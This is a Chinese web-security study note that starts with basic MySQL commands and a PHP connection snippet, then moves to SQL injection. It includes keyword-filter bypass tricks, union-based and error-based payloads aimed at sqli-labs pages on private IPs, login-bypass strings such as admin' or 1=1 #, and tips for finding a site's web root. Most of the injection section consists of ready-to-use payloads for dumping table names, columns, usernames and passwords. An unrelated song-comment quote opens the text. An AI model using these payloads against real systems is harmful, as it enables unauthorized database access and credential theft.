她其實並不喜歡你,只是在寂寞的時候,你剛好撞上去,剛好你對她好,剛好你能入她眼,剛好她來著不拒,這所有都是剛好。。。
---- 網易雲熱評
一、MYSQL語句
創建數據庫
create database test;
選擇要操作的數據庫
user test
創建表
create table aiyou ( id int, username varchar(20), password varchar(30));
向表中插入數據
insert into aiyou values(1,'admin','456');
insert into aiyou values(2,'boss','123');
insert into aiyou values(3,'ttt','123'),(3,'qqq','321'');
![某教程學習筆記(一):09、MYSQL數據庫漏洞](http://p2.ttnews.xyz/loading.gif)
顯示aiyou表中的所有記錄
select * from aiyou;
從aiyou表中查找滿足條件id=1的記錄
select * from aiyou where id=1;
從aiyou表中查找滿足條件id=1的記錄,並只顯示username和password字段內容
select username,password from aiyou where id=1;
![某教程學習筆記(一):09、MYSQL數據庫漏洞](http://p2.ttnews.xyz/loading.gif)
從aiyou表中查找同時滿足條件id=1以及username=“admin”的記錄
select * from aiyou where id=1 and username="admin";
從aiyou表中查找同時滿足條件id=1或者username=“boss”的記錄
select * from aiyou where id=1 or username="boss";
drop database test;刪除數據庫
drop table test;刪除表格
update aiyou set password='111' where username='boss' 更新數據
delete from aiyou where username='boss'; 刪除數據
select load_file('c:/111.txt'); 讀文件
show databases; 顯示當前數據庫
show tables;顯示選擇的數據的所有表
show create table aiyou \\G;顯示錶結構的詳細數據
describe 表名;顯示錶結構,大寫可以自動補全
select database(); 顯示當前數據庫
select version() 顯示數據庫版本
select user() 顯示當前用戶
select now();顯示當前時間
select system_user();獲取系統用戶名
select current_user();獲取當前用戶名
select session_user();連接數據庫的用戶名
select @@datadir; 讀取數據庫路徑
select @@basedir;mysql安裝路徑
select @@version_compile_os; 操作系統
二、數據庫連接
$dbhost = 'localhost'; // mysql服務器主機地址
$dbuser = 'root'; // mysql用戶名
$dbpass = 'root'; // mysql用戶名密碼
$conn = mysqli_connect($dbhost, $dbuser, $dbpass);
if(! $conn )
{ die('Could not connect: ' . mysqli_error());
}
echo '數據庫連接成功!';
mysqli_close($conn);
?>
三、防注入繞過
目標:http://www.aiyou .com?id=1
1、大小寫繞過
http://www.aiyou .com?id=1 And 1=1
2、雙寫繞過
http://www.aiyou .com?id=1 aandnd 1=1
3、%00繞過
http://www.aiyou .com?id=1 a%00nd 1=1
四、手工注入
1、http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=1 返回正常
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 返回錯誤,說明存在注入
2、判斷列數
http://192.168.21.140/sqli/Less-2/index.php?id=1 order by 3 返回正常,4返回返回錯誤,說明存在三列
3、聯合查詢
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,2,3 將2或3輸入我們想要查詢的內容
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,version(),database(),獲取當前數據庫及數據庫版本
4、獲取表名
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' 獲取security數據庫下的表名
5、獲取列名
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' 獲取users表下的列名
6、獲取字段內容
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(username),group_concat(password) from users
五、報錯注入
1、獲取數據庫用戶
http://192.168.21.137/sqli/Less-1/index.php?id=1' union select 1 from (select count(*),concat(floor(rand(0)*2),(select user()limit 0,1))a from information_schema.tables group by a)b --+
2、獲取數據庫名稱
http://192.168.21.137/sqli/Less-1/index.php?id=1' union select 1 from (select count(*),concat(floor(rand(0)*2),(select database()limit 0,1))a from information_schema.tables group by a)b --+
http://192.168.21.137/sqli/Less-1/index.php?id=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
3、獲取當前數據庫名稱,返回的是一個十六進制,需要還原
http://192.168.21.137/sqli/Less-1/index.php?id=1' and (select 1 from(select count(*),concat((select(select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
4、獲取表名
http://192.168.21.137/sqli/Less-1/index.php?id=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
5、獲取字段
http://192.168.21.137/sqli/Less-1/index.php?id=1'and(select 1 from(select count(*),concat((select(select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 2,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
6、獲取字段內容
http://192.168.21.137/sqli/Less-1/index.php?id=1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x7e,password,0x27,0x7e) FROM users LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
六、後臺繞過
1、admin'#
2、admin' or 1=1 #
3、'or'='or'
4、admin' or '1'='1
5、admin' #
七、獲取網站的根沐浴露
1、報錯顯示
2、site:目標網站 warning
3、遺留文件phpinfo
4、漏洞爆路徑
5、讀取配置文件
禁止非法,後果自負
閱讀更多 web安全工具庫 的文章